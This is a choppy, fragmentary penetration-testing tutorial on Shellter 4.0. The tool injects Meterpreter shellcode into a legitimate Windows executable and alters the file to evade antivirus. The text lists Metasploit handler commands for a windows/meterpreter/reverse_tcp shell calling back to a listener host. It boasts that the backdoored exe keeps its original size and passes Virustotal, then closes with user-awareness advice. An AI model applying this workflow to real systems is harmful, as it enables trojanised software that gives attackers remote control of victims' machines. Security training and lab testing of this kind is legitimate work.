for pentesters was revealed at B-Sides Lisbon earlier this month.
Updates include increased obfuscation through a custom encoder and
polymorphic decoder. Also this version saves a few steps by including
the most common Meterpreter shells.
.exe file, adds the shell code to it and then does a great job of
modifying the file for AV bypass. The program’s automatic mode makes the
whole process very pain free. In this tutorial I used the latest
version of Kali Linux and a Windows 7 Virtual Machine.
contain the newest 4.0 version yet. To get the latest, instead of using
‘apt-get install shellter’, just download and extract the ZIP file to
the “/etc/share” folder.
terminal or use ‘wineconsole shelter’ from ‘/etc/share/shellter’ if you
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
And we have a shell!
Compare the size of the backdoored exe to the original one. They are the
exact same size! Now upload the backdoored exe to Virustotal and scan
it for malicious content:
will bypass AV can be created pretty easily. AV is great but it can’t
stop everything, you need to train your company users to be vigilant
when using internet sites, social media and e-mail. Avoid suspicious
websites, don’t allow website popups or warnings to install anything and
never open unsolicited or suspicious attachments in e-mails. If you
don’t know if you should click on something, ask your IT department. A
little user vigilance can go a long way at protecting your network!